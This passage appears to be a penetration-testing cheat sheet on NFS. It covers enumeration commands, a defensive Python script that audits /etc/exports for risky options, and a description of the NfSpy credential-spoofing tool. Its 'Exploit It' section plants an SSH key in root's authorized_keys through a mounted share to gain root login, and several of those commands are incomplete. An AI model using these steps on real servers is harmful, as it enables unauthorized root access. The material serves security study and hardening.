NFS (2049)

In default configurations, the remote NFS server will map the UID/GID of the connecting user. For example, if ‘int0x33’ is my local user account and /etc/passwd and /etc/group assign me a uid and gid of 3333, then on connecting to a remote NFS share I’ll have access as that same uid and gid on the remote system, regardless of which username is assigned to them there. This includes root.


root@box:~# rpcinfo -p
# All Mount Points
root@box:~# showmount -a
# Export List
root@box:~# showmount -e
# Directories
root@box:~# showmount -d
# Hosts
root@box:~# showmount

Exploit It

root@box:~# ssh-keygen
root@box:~# mkdir /tmp/r00t
root@box:~# mount -t nfs /tmp/r00t/
root@box:~# cat ~/.ssh/ >> /tmp/r00t/root/.ssh/authorized_keys
root@box:~# umount /tmp/r00t
root@box:~# ssh root@

Configuration Files

  • /etc/exports
  • /etc/lib/nfs/xtab
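The /etc/exports entries listed above are where the uid/gid trust described at the top of the page is configured. The audit script below is an added example, not from the original page or from NfSpy: it parses an exports file (a constructed sample is embedded, and a real path can be passed on the command line) and flags entries whose host spec or options widen that trust: wildcard clients, a bare `(options)` spec that exports(5) treats as "every host", `insecure`, `no_root_squash`, and exports that still rely on AUTH_SYS (client-asserted uid/gid) rather than `sec=krb5*`. The severity labels are the script's own convention, not anything NFS defines.

```python
"""Audit an /etc/exports file for entries that let a client's asserted
uid/gid reach further than intended. Added example, not from the page."""
import re
import sys
from dataclasses import dataclass, field

# Constructed sample; not a real host's exports file.
SAMPLE_EXPORTS = "\n".join([
    "# constructed sample, not a real host's exports file",
    "/srv/backup   *(rw,no_root_squash)",
    "/home         10.0.0.0/24(rw,sync,root_squash)",
    "/srv/public   (ro)",
    "/srv/kerb     10.0.0.5(rw,sec=krb5p,root_squash)",
    "/srv/multi    10.0.0.1(ro) \\",
    "              10.0.0.2(rw,no_root_squash)",
])


@dataclass
class ExportFinding:
    path: str
    client: str
    options: list
    reasons: list = field(default_factory=list)
    severity: str = "none"   # none / low / medium / high (script's own scale)


def parse_exports(text):
    """Return (path, client, options) tuples from exports(5) content.
    Handles comments, blank lines, backslash continuations, and the
    '/path (opts)' form, where a space before '(' means 'all hosts'."""
    text = text.replace("\\\n", " ")          # join continuation lines
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        parts = line.split()
        path, clients = parts[0], parts[1:]
        if not clients:
            clients = ["*"]                   # no client spec: exported to everyone
        for spec in clients:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"        # '(ro)' alone is a wildcard export
            opts = [o.strip() for o in (m.group(2) or "").split(",") if o.strip()]
            entries.append((path, client, opts))
    return entries


def is_wildcard(client):
    """True for '*', '?' globs or an empty spec, i.e. any host may mount."""
    return client == "" or "*" in client or "?" in client


def audit(text):
    """Score every export; reasons explain what widens client trust."""
    findings = []
    for path, client, opts in parse_exports(text):
        f = ExportFinding(path, client, opts)
        if not any(o.startswith("sec=krb5") for o in opts):
            # Default sec=sys: the server believes whatever uid/gid the client sends.
            f.reasons.append("AUTH_SYS: server trusts client-asserted uid/gid")
            f.severity = "low"
        if is_wildcard(client):
            f.reasons.append(f"exported to wildcard host spec {client!r}")
            f.severity = "medium"
        if "insecure" in opts:
            f.reasons.append("insecure: requests accepted from unprivileged ports")
            f.severity = "medium"
        if "no_root_squash" in opts:
            f.reasons.append("no_root_squash: client uid 0 is root on the server")
            f.severity = "high"
        if "rw" in opts and is_wildcard(client):
            f.reasons.append("writable by any host")
            f.severity = "high"
        findings.append(f)
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EXPORTS
    for f in audit(text):
        if f.reasons:
            print(f"[{f.severity}] {f.path} -> {f.client}: {'; '.join(f.reasons)}")
```

Run it without arguments to see the sample scored, or with `/etc/exports` on an NFS server you administer. The `/srv/public (ro)` line is the case most worth remembering: the space before the parenthesis makes the options apply to every host, which the script reports as a wildcard export.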


NfSpy is a Python library for automating the falsification of NFS credentials when mounting an NFS share. Included are two client programs:

  • nfspy uses the Filesystem in Userspace (FUSE) library to mount an NFS share in Linux. This allows the use of any regular file-searching and manipulation programs like grep and find to explore the NFS export.
  • nfspysh is an ftp-like interactive shell for exploring NFS exports. It does not require the FUSE library, so it can run on non-Linux platforms.